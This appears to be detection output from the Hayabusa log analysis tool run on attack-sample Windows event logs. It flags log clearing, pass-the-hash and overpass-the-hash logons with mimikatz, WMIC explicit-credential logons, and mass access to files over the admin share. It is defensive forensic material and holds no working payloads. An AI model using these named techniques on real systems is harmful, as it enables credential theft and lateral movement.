2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 365ABB72-ACB0-5C8E-0000-001085D50D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 365ABB72-B160-5C8E-0000-0010253D1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx
2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer: | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx
2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,../hayabusa-rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: WIN-77LTAPHIQ1R.example.corp,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,../hayabusa-rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx
2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
